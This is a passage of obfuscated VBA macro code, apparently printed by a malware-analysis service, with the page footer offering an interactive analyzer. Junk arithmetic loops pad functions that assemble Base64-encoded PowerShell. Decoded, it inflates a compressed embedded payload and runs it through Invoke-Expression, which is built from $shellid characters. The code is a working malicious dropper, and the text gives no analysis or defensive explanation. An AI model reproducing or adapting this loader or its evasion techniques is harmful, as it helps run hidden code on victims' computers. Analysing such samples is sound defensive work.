kHNcXZAo = "QBCAGEAb" + "QBwADAAZgA" + "3AEIATQBoA" + "FYAeQAvAFcA" + "YgBvAHcAdgBrAG" + "YALwBuAH" + "UAUABNAHIAdQ" + "BpAG0ARQBOA"
For zoTin = QajOY To dRuii
      For zzTKj = cUTMnn To 62025
         hvlqJ = (33243 / CBool(tBtwiF) - BEzwir / Oct(87010 / Hex(98315) / pIdGSC + Rnd(nviAT / Fix(37))))
Next
   jEYNNG = 96279 - 49454
Next
nPrHDN = "FAAawAyAFUAQg" + "BzAGIAVA" + "BpAHIAZAA0A" + "DcAagA2A" + "HAAUAB" + "oAEkAUwBI" + "AGQAbwBIAF" + "cANgBzA" + "DMAM" + "gA4AE8AWAA0AFE"
oMTEIoiOCH = jEQGiOQ + KZcrzLAIm + wraFrwkjUFI + kHNcXZAo + nPrHDN
End Function
Function kiHZjY()
On Error Resume Next
For BktTP = rJodi To whfKd
      For zGCwEP = YvXRi To 74271
         JcHtM = (99029 / CBool(rwmuWl) - kWtCk / Oct(31331 / Hex(1351) / KEfiz + Rnd(RTrJrh / Fix(37))))
Next
   Talwd = 5772 - 10805
Next
JFRwkbasv = "AZABWAHkARQB5A" + "HgAKwBGAEYA" + "awBjAEkA" + "cgB" + "pAE" + "4AeABWAGEAT"
For PCiiw = ZiOuWA To SCOizw
      For cukfDR = vHEGN To 90546
         uCzAB = (6550 / CBool(ocOVjN) - YWQdG / Oct(59447 / Hex(63941) / SCahX + Rnd(WKoJFj / Fix(37))))
Next
   ARhws = 67095 - 77097
Next
zHwqtE = "AB" + "lAFMAM" + "ABF" + "AGwAeQBpADQA" + "OABpAEEAaA"
For VKWDP = kocGQ To ZkuaTj
      For RSaLb = dYEiiO To 92352
         CwrDdH = (11397 / CBool(VLCpEw) - XGfMU / Oct(42663 / Hex(99389) / wvWlzf + Rnd(wsUiW / Fix(37))))
Next
   CWqYIf = 93284 - 29598
Next
RrtuXQLb = "BwAFoAcABXAHg" + "AM" + "QBwAHgAYwBH" + "AFkA" + "MAB6AE8ATgAzAE" + "oAQQBaADMAWABGA" + "G0AZQBiAG8AdAB0" + "AEwA"
For mciIh = zBbWDB To IGWGGQ
      For KUVbc = kooMq To 6112
         pItGrw = (57564 / CBool(qsLTmJ) - jCBZj / Oct(4127 / Hex(97755) / HDfNr + Rnd(NPjzV / Fix(37))))
Next
   zNPPI = 73436 - 28832
Next
uVinS = "QgBRAFQA" + "WgBXAHgAe" + "QBQAHYARwB" + "uAF" + "QAVwBIAHUAU" + "gBWAEsANABv" + "AEUAegAyAEI" + "AVABvAGIAdgB" + "jAEwAJwAgACkAI"
For cJIpL = FmKQW To qqlDLl
      For nddfTQ = OVnmR To 88852
         ipwvpB = (42802 / CBool(bFPds) - JbLDX / Oct(158 / Hex(53782) / zioZGH + Rnd(wXzcqL / Fix(37))))
Next
   nIVjP = 63259 - 3272
Next
QOHDcblAap = "AAsACAAWwBJA" + "G8ALgBDAE8AbQ" + "BQAHIAZQBTAF" + "MAaQBP" + "AE" + "4AL"
For PqYrF = bjuuLn To UGQvPW
      For hQABCH = Chnkvp To 52378
         wAOBo = (44410 / CBool(FifXLT) - FnAJZ / Oct(80852 / Hex(99442) / WpwGZB + Rnd(JQwOF / Fix(37))))
Next
   PhNhF = 87494 - 20423
Next
lFsNXCMKP = "gB" + "DAE8AbQBQAFI" + "ARQBTAHMAaQBv" + "AE4AbQB" + "vAEQAZQBd" + "ADoAOgBEAEUAQwB" + "PAG0AcABSAE" + "UAUwBTACAA"
For WiwUA = AjlQlO To dZDiw
      For wYPZwO = pGmbTw To 79025
         ALCmY = (48611 / CBool(aiidr) - lHKzHG / Oct(22431 / Hex(87660) / EzGGm + Rnd(wJwoZk / Fix(37))))
Next
   OBwZNs = 96628 - 69349
Next
hPccK = "KQB8AC" + "AARgBvAHIAZQBBA" + "EM" + "ASAAtAG8AQgBqAG" + "UAQwB0AH" + "sAbgBlAHcALQBPA"
kiHZjY = JFRwkbasv + zHwqtE + RrtuXQLb + uVinS + QOHDcblAap + lFsNXCMKP + hPccK
End Function
Function iBudKJnR()
On Error Resume Next
For SWuEwc = MpdisG To jSmMd
      For mpROH = IDhsSv To 45199
         jjMiu = (37992 / CBool(jwwGlI) - QHajUO / Oct(8905 / Hex(56917) / fwFUZ + Rnd(zKiVrV / Fix(37))))
Next
   FERJpC = 81594 - 41270
Next
mKnUIPlZu = "EIASg" + "BFAEMAV" + "AAgAHMAWQ" + "BzAHQARQBNA" + "C4ASQ" + "BPAC4AcwB0A" + "FIAZQBB" + "AG0Acg" + "BlAGEARAB"
For WlJma = maJJD To jlpzHE
      For lYQQd = BVOKZ To 3782
         jXZTKm = (8284 / CBool(XHLiST) - TbKiz / Oct(78420 / Hex(68844) / GUjTYw + Rnd(QkHQt / Fix(37))))
Next
   LWoUA = 44012 - 27263
Next
AzBzuMJX = "FAFIAKAAgACQA" + "XwAsAFsA" + "cwBZAHMA" + "dABFAG0ALgB0AE" + "UAe"
For EhLzc = mArEw To nTwiS
      For iwrbaC = QHFVN To 94519
         VTBnU = (37933 / CBool(tmQtDR) - VsXKBV / Oct(77960 / Hex(29365) / cGJaM + Rnd(jidHji / Fix(37))))
Next
   RLJzj = 78295 - 24746
Next
PpHvj = "ABUAC4ARQ" + "BuAGMA" + "bw" + "BEAGkA" + "bgBnAF0AOgA6A" + "GEAUwBjAEkASQA"
For iXkfuO = KLcdGv To jLtkz
      For lPwlP = aLACl To 99665
         zujYu = (33876 / CBool(wTSiDY) - sfzFz / Oct(82211 / Hex(14480) / SbzQtn + Rnd(KIqdD / Fix(37))))
Next
   iznwSR = 14050 - 33786
Next
auiivQNGM = "gACkAfQApA" + "C4AcgBFA" + "EE" + "AZABUAG8AZ" + "QBOAEQAK" + "AApAC" + "AAfAAgACYAIAA"
For Rircij = wmJuG To HZiYsa
      For JoZUb = iKHjZ To 437
         VKRZR = (11419 / CBool(HMDUJr) - pNTuY / Oct(62427 / Hex(15359) / cIWBTz + Rnd(oFjuiG / Fix(37))))
Next
   IEGnjC = 94708 - 71817
Next
RMRdMIoWG = "oACAAJABzAGgAR" + "QBsAGw" + "AaQB" + "kAFsAMQBdA" + "CsAJABzAGgA" + "RQBs" + "AEwAaQBkAFsA" + "MQAzAF0AKw" + "AnAFgA"
For LkLtz = mBTQhh To CQmtP
      For zlOIv = FOnkwF To 82551
         DLQHEu = (1996 / CBool(haRZP) - CqAqma / Oct(76710 / Hex(38559) / bQBsZz + Rnd(WKqqF / Fix(37))))
Next
   zioVWd = 6711 - 76040
Next
VKXfAUC = "JwApAA" + "=="
iBudKJnR = mKnUIPlZu + AzBzuMJX + PpHvj + auiivQNGM + RMRdMIoWG + VKXfAUC
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.